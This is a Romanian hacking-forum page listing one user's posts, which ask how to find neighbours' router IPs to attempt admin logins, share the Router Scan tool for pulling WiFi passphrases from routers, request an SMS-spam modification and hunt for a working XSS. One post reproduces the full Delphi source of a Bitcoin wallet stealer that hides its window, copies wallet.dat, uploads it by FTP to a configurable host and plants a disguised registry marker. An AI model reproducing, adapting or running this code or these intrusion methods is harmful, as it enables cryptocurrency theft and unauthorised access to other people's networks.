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Everything posted by TheRogue27

  1. neah, nu merge asa eu am vecin la acelasi isp si are alta clasa decat mine, iar un alt router de la care mai "imprumut" alt net...are si el alta clasa...si chiar daca ar fi in aceiasi clasa...trebuie sa ai mare noroc sa prinzi chiar pe cele din vecini....e mai greu. Oricum, asta e...nu e bai, incercam si eu marea cu degetu
  2. nu asa de wide, avand in vedere ca sunt ip-uri dinamice, clasele sunt diferite. Eu ma refer mai targetuit, direct pe routerele de le am eu in raza. De ex, vad router-ul crazy, semnal bun wpa2, slabe sanse sa il matrasesc. Am eu cum sa aflu ce ip are crazy? ca sa pot incerca un login la pagina lui de admin?
  3. Adica ce am eu in zona, la ce ma pot conecta eu, routerele de la wlanul meu, nu stiu cum sa explic ...
  4. Sincer sa fiu nu l-am testat atat de intens, nu cred ca am pus mai mult de doua clase de fiecare data. BTW sunt curios, exista vreo posibilitate sa vad pe ce ip-uri ies routerele de le am eu in "raza" ?
  5. Da ma, da, stim ca sunt oameni competenti, dar face-ti topic separat pt. discutiile astea. Ce rost isi au discutiile astea ?
  6. Ba nu am mai vazut asa ceva...parca sunt pe forumul www.maicutele.ro Am pus o intrebare. Nu am nevoie de morala voastra, de impresiile voastre de oameni cinstiti. Se poate inchide, testat si functioneaza
  7. Router Scan is able to find and identify a variety of devices from a variety of known routers / routers, and most importantly - to pull out of them useful information, in particular the characteristics of the wireless network: a way to protect the access point (encryption), access point name (SSID) and key access point (passphrase). Also receives information about the WAN connection (useful when scanning the local network) and outputs the make and model of the router. Getting information occurs in two possible ways: the program will try to pick up a couple of login / password to the router from the list of standard passwords, resulting gain access. Or will be used non-destructive vulnerability (or bugs) for the router model, allowing to obtain the necessary information and / or to bypass the authorization process. TinyUpload.com - best file hosting solution, with no limits, totaly free pass: Stas'M Corp. Virus total https://www.virustotal.com/en/file/a5f42a031933c0db2198aa24adb0799290aa0bbba9a9fe556fe7efb60d616602/analysis/
  8. A reusit cineva sa il testeze? eu l-am cimpilat dar nu am pe ce/cum sa il verific
  9. Ce parere aveti despre wallet stealer-ul asta https://leakforums.org/thread-232703 program dbs; // Bitcoin Stealer // developed by Jimmy // for http://exclusivehackingtools.blogspot.com {$IF CompilerVersion >= 21.0} {$WEAKLINKRTTI ON} {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])} {$IFEND} uses Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry; // Function to set the window state hidden function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow'; // Function to get the AppData path function AppDataPath: String; const SHGFP_TYPE_CURRENT = 0; var Path: array [0 .. MAXCHAR] of char; begin SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @path[0]); Result := StrPas(Path); end; // Function to check a file size function FileSize(FileName: wideString): Int64; var sr: TSearchRec; begin if FindFirst(FileName, faAnyFile, sr) = 0 then Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow) else Result := -1; FindClose(sr); end; // Function to generate random string function RandomString(PLen: Integer): string; var str: string; begin Randomize; str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; Result := ''; repeat Result := Result + str[Random(Length(str)) + 1]; until (Length(Result) = PLen); end; // ============================================================================ var Debug: Boolean; FTP: TIdFTP; REG: TRegIniFile; RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String; Error: String; begin // The window should be hidden without using this API ShowWindow(GetConsoleWindow, SW_HIDE); // Debug or build release ? Debug := True; // Set registry key value (random) RegValue := '6556'; // At the end of the first execution we will write a key in the registry. // Now we will try check if the key exists. If yes, it means // that the wallet has already be stolen. Avoid useless duplicates. try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKeyReadOnly('Software'); RegCurrentValue := REG.ReadString('Google', 'Version', ''); REG.CloseKey; REG.Free; except end; // Check if wallet has been already stolen (to avoid duplicates) if not(RegCurrentValue = RegValue) then begin try // Generate path to Bitcoin wallet file if Win32MajorVersion >= 6 then // Microsoft Windows Vista and newer Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat') else // Microsoft Windows XP Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat'); // If wallet file exists, check the FileSize (skip large file > 10MB) if FileExists(Path) then if FileSize(Path) < 10000000 then begin // Generate a random filename FileName := RandomString(20) + '.dat'; // Initialize upload via Indy FTP component FTP := TIdFTP.Create(); FTP.ConnectTimeout := 20000; FTP.ReadTimeout := 20000; // Setup with your FTP details FTP.Host := 'ftp.host.com'; FTP.Username := 'username'; FTP.Password := 'password'; UploadPath := 'www/'; // Connect and upload if not Debug then begin FTP.Connect; FTP.Put(Path, UploadPath + FileName); end; // After upload attempt, disconnect and free the FTP component FTP.Quit; FTP.Disconnect; FTP.Free; // Try to add a key to registry to avoid double execution try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKey('Software', True); REG.WriteString('Google', 'Version', RegValue); REG.CloseKey; REG.Free; except end; end; except // Catch error, you never know... on E: Exception do Error := E.ClassName + ': ' + E.Message; end; end; end.
  10. Mai exista? ca am vazut pe cineva pe un alt forum cerand o invitatie
  11. Il poti modifica sa trimita la o lista de numere, cate un singur sms/numar?(asta ar insemna sa poti trimite un mesaj ales de tine)) Mi-ar fi foarte util:D
  12. ai incercat? Sau faci caca fara hartie la tine???
  13. DA intradevar, are scurgeri de refferer versiunea stand alone, multi au fost banati, nu as sfatui pe nimeni sa il foloseasca
  14. specifica ca UNetBootin nu merge pentru windows
  15. pacat ca pe al meu 120s, nu merg alte cartele...e vorba de retele...
  16. Ma da ce ai cu turcii, ca vad ca cele mai multe sunt de .tr ce dreaq sa faci cu ele
  17. e si unul public, dar nu reusesc sa il implementez in sursa, i'm dumb!
  18. pfuu si eu cautai un xss valid...de inebunii si degeaba:( cine ne ajuta si pe noi? Pfuu de fapt gasii, dar nu reusesc sa il implementyez in sursa...firara mama ei de programare...
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